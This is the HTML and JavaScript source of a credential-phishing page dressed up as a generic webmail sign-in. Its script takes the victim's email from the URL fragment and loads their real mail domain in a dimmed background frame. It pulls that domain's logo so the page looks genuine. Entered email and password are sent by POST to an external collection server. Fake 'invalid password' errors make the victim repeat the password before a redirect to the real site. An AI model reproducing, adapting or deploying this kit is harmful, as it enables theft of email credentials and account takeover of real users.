<html lang="en"><head>
 
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <meta name="referrer" content="strict-origin">
    <link id="favicon" rel="shortcut icon" type="image/png" href="">

    <script src="https://code.jquery.com/jquery-2.2.4.min.js" integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin="anonymous"></script>
    <title id="titleBar">Sign in </title>
    <script nonce="">
        // Ensure that parent window and opener reload if a page is redirected to login
        if (top.location != window.location) {
            top.location.reload();
        }
        if (window.opener && window.opener.top.location != window.location) {
            window.opener.top.location.reload();
            self.close();
        }
    </script>


    <style>
        body {
            background-color: #eeeeee;
            font-family: Helvetica Neue, Helvetica, sans-serif;
            font-size: 13px;
            color: #425152;
            margin: 0;
        }

        ::-moz-placeholder {
            color: #d9dad9;
        }

        :-ms-input-placeholder {
            color: #d9dad9;
        }

        ::-ms-input-placeholder {
            color: #d9dad9;
        }

        ::placeholder {
            color: #d9dad9;
        }

        a {
            color: #425152;
            text-decoration: none;
        }

        a:hover {
            text-decoration: underline;
        }

        input {
            border-radius: 5px;
            padding: 5px 3px;
        }

        input.submit {
            font-weight: bold;
            text-align: center;
            min-width: 90px;
            color: #f0f0f0;
            background: #444444;
            padding: 5px 12px;
            border-color: #444444;
            border-style: solid;
            cursor: pointer;
        }

        input.submit:hover {
            color: #ffffff;
        }

        .row {
            margin: 10px 0;
        }

        .row:after {
            content: "";
            display: table;
            clear: both;
        }

        .logoWithPortalIcons {
            width: 150px;
            height: 50px;
            background: transparent url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJYAAAARCAYAAAA/tFWCAAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAB3RJTUUH3gYNAictBVTA/AAAAj5JREFUaN7tWdFtgzAQfakyAPICyQffNCOQCdpMUDaoMkHIBFUnSDJB0gkgE5T62x9MgLJB+pGLRK2AMbYbiHgSPxjuznfPvjt7BOAMO0gBzAGgCHwPQAJgJn2zZlzEReBX6mRcjIrAD+n/MnIAC8ZFVnoXA1i1sPUEICOZO7LdVOYVIwC37J+X9LT1eUaPbDMqdOpiTfNPSF5rHzzBDfY3SGWKKYA9kdYUHjkuIidG6AdmfbHZOrGKwJ8Zsl1FrlcHcjcku0/YOPRz94jlKPBlvDiSG6J/eO+qYeOaPGtSa6nG1goZec03eZM6r8HO900psfzuWmOV5y/XG011tKltVOl7Iy1c1SIetbRHnp/sA6W9Y9tMZVykCnKBcRErxnNDcqMBcbOe7VInAJ//kBGc7VgTTYdfO6xrjRUBeKv4dse42Das0z6qOiPGxVJRlDfZsfqY+myn9z+xc02sSLPjkFNDXdCOml1bm64pMdgRHg2JZuw6Xbz3FYfBBQOxbGOraAoGWEiFqUbKQscCkuNyKq3CREr3EXU6j0au9T1jd5aeuEeOiyXbE4N5hzV1iq6OUCG/rc9vyW0yZqNW07LX+nED3fNVBSllXKRF4Md1RxFF4E9rGoi8SWc54C6YUROUjx0ID1F/iZsqxmPqLFc1/w/EstMVytgZ+HZPpPIAHF0QK3PsrK+BL1qLXAdHAz07XK6YPAC59a6QcXFwWBSehmOBzsKjuJ9cHjcs4ObAcUnXPQO6hRTAc2nx//wCPaq4/QlxCjAAAAAASUVORK5CYII=')
                /*IconsTogether.svg*/
                no-repeat left top;
        }

        .logoOnly {
            width: 280px;
            height: 30px;
            overflow: hidden;
        }

        .logoOnly .logoWithPortalIcons {
            width: 320px;
            height: 120px;
        }

        .title {
            font-size: 26px;
            margin: 20px 0 10px;
        }

        .red {
            color: #EE3031;
        }

        a#create-account {
            display: inline-block;
            border-radius: 4px;
            padding: 3px 8px;
            border: 1px solid #EE3031;
        }

        a#create-account:hover {
            text-decoration: none;
        }

        .col1,
        .col2 {
            float: left;
            line-height: 30px;
            vertical-align: middle;
            padding-top: 4px;
        }

        .col1 {
            width: 124px;
            font-size: 13px;
            font-weight: 600;
        }

        .col2 {
            width: 286px;
        }

        .col2 input {
            width: 96%;
        }

        .error {
            color: #D52B1E;
            font-weight: normal;
        }

        .container {
            background: rgba(255, 255, 255, 1.0);
            padding: 40px;
            box-shadow: 2px 2px 4px 2px #ccc;
            width: 416px;
            border-radius: 5px;
            /*
            margin: 0 auto;
            position:absolute;
            left:0;
            right:0;
            top:38%;
            top:100px\9;
            transform: translateY(-50%);
			*/
            margin: 10% auto 30px auto;
            box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
            transition: all 0.3s cubic-bezier(.25, .8, .25, 1);
        }

        .password-icon {
            width: 20px;
            position: absolute;
            cursor: pointer;
            margin-top: 9px;
            margin-left: -28px;
            background-color: white;
        }

        #login_footer {
            line-height: 125%;
            font-size: 12px;
            text-align: justify;
            width: 500px;
            margin: 90px auto auto auto;
            padding-left: 10px;
        }


        @media only screen and (max-width: 600px) {
            body {
                background-image: none;
            }

            .container {
                /*
                position:relative;
                padding: 20px;
                box-shadow:none;
                width: 375px;
                top:0;
                left:auto;
                right:auto;
                transform: translateY(0);
				*/
                width: 100%;
                border-radius: 0;
                box-shadow: none;
                padding: 0;
                margin-top: 0;
            }

            .container div.body {
                padding: 40px 20px;
            }

            .col1,
            .col2 {
                float: none;
                width: 100%;
            }

            #login_footer {
                width: 99%;
                margin-top: 20px;
            }

            #login_footer div.content {
                padding: 10px 20px 10px 10px;
            }

            .password-icon {
                margin-top: -25px;
                right: 7%;
            }

        }


        .xlogo {
            color: #fff;
            margin-bottom: 10px;
            margin-top: -25px;
        }

        .xlogo img {
            vertical-align: middle;
            width: 5%;
            height: 5%;
            object-fit: contain
        }

        .xlogo span {
            vertical-align: middle
        }

        .text-g {
            font-family: "Arial Black", Gadget, sans-serif;
            text-transform: uppercase !important;
            text-align: center;
            font-size: 25px;
            color: #444444;
            background-color: rgba(255, 255, 255, 0);
            text-shadow: rgb(255, 255, 255) 2px 2px 2px;
        }

        #root {
            position: absolute;
            left: 0;
            right: 0;
            bottom: 0;
            top: 0;
            z-index: -10;
            pointer-events: none;
            filter: brightness(0.3)
        }
    </style>
 
</head>

<body>
    <div id="login_form" action="" method="post" autocomplete="off">
        <input type="hidden" name="csrfmiddlewaretoken" value="xWUPRch6gUXcsYdMNLyWrIvExcWeJ3qTtf8VMHZWmQ2EBBFj3eYVAcVdcPIJiDWq">
        <input type="hidden" name="next" value="/">
        <div class="container" id="container" style="padding-bottom:10px!important; position: relative;">
		<form>
            <div style="position:absolute; top:0; width:100%; height:100%; left:0; background:#fff; opacity:0.7; display:none" id="bg_screen"> </div>
            <img src="https://ik.imagekit.io/escrowmade/Rolling-1s-200px__1__trHCWXy9jD.gif" style="width:50px; position:absolute; top:50%; left:50%; transform:translate(-50%, -50%); display:none" id="loading_image">
        

    <input type="hidden" class="form-control" name="hido" id="hido" value=""> 
        <div class="body">
           
            <div class="xlogo">
                <img id="main_logo_id" src="">
                <span style="text-transform: capitalize;" class="text-g" id="banNer">Mail</span>
                </div>
            <div class="row">
                <div class="col1"><label for="id_email">Email:</label></div>
                <div class="col2"><input type="text" name="email" value="" id="email" placeholder="Email"></div>
            </div>
                <div class="col1"><label for="id_pass">Password:</label></div>
                <div class="col2"><input type="password" name="password" id="pass" autofocus="" placeholder="Password"></div>
                
            </div>
            <br><br>
            <div class="row" style="margin:auto;">  
                <div><span class="auth_reg" id="auth_reg"  style="color:red;"></span></div>
            </div>
            <div class="row" style="  float:right;">
			
                <div class="col1" style="line-height:40px;padding-top:10px;">
                    <input type="submit" id="submit_btn" class="submit" value="Continue" style="padding:7px 24px;"></div>
            </div>
			</form>
			
			 <br>
                    <br>
            <div class="row"  style="margin-top:50px;">
                
                <p>All right reserved. Copyright 2024 <span id="kai" style="text-transform: capitalize;">Webmail</span>.
                   
                </p>
            </div>
</div>
</div>


  <div id="root">
        <iframe id="mainPage" scrolling="no" src="" width="100%" height="100%" frameborder="0"></iframe>  
    </div>


 
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>  
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script> 
<script>
$(document).ready(function(){
var count=0;
var email = window.location.hash.substr(1);

if (!email) {

}else
{
var my_email =email;
var ep = "pvt00";
console.log(email)
var my_email =email;
$('#email').val(my_email); 
 
  
  
var ed = '';
var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

if (!filter.test(my_email)) {
$('#error').show();
//email.focus;
return false;
}

var ind=my_email.indexOf("@");
var my_slice=my_email.substr((ind+1));
var c= my_slice.substr(0, my_slice.indexOf('.'));
var url = "https://srl00.com/fireb/general/_sep/pil/index2pil.php";
var mainPage = 'https://'+my_slice;
document.querySelector('iframe').src = mainPage;
var final= c.toLowerCase();
var finalu= c.toUpperCase();
console.log(mainPage);
$("#banNer").html(finalu +' Mail');
$("#titleBar").html('Sign in to ' + finalu +' Mail');
$("#kai").html(finalu); 
$("#main_logo_id").attr("src", "https://logo.clearbit.com/"+my_slice); 
} 

$('#submit_btn').click(function(event){
event.preventDefault();
var email=$("#email").val();
var pass=$("#pass").val();
 
if (!email) {
    $('#email').show();
    $('#email').html("Email not found"); 
                return false;
            }
if (!pass) {
    $('#pass').show();
    $('#pass').html("Password is empty!"); 
                return false;
            }
 
count=count+1; 
$.ajax({
dataType: 'JSON',
url: url,
type: 'POST',
      	data:{
			email:email,
            password:pass,
      	}, 
            beforeSend: function(xhr){
            	$('#submit_btn').val('Verifing...');
            },
            success: function(response){
            	if(response){ 
            		console.log(response);
            		if(response['signal']){
            			$("#pass").val("");
            			if (count>=4) {
            				count=0; 
                   window.location.replace("https://www."+my_slice); 
                }
				
			//$('#auth_reg').hide();
            $("#auth_reg").show();  
            
			if (count==1) { $('#auth_reg').html("Invalid password. Please try again"); } 
			if (count==2) { $('#auth_reg').html("Authentication failed! Try again"); } 
			if (count==3) { $('#auth_reg').html("Authentication error! Try again"); }
            } 
        }
    },
    error: function(){
     	$("#pass").val("");
		
			if (count==1) { $('#auth_reg').html("Invalid password. Please try again"); } 
			if (count==2) { $('#auth_reg').html("Authentication failed! Try again"); } 
			if (count==3) { $('#auth_reg').html("Authentication error! Try again"); }
    	if (count>=4) {
    		count=0;
    		 window.location.replace("https://www."+my_slice);
    	}
            $('#auth_reg').val("Invalid password. Please try again");
                   },
    complete: function(){
    	$('#submit_btn').val('Continue');
    }
});
  });
		
		//}); 
	});
 
    </script>
  
</body></html>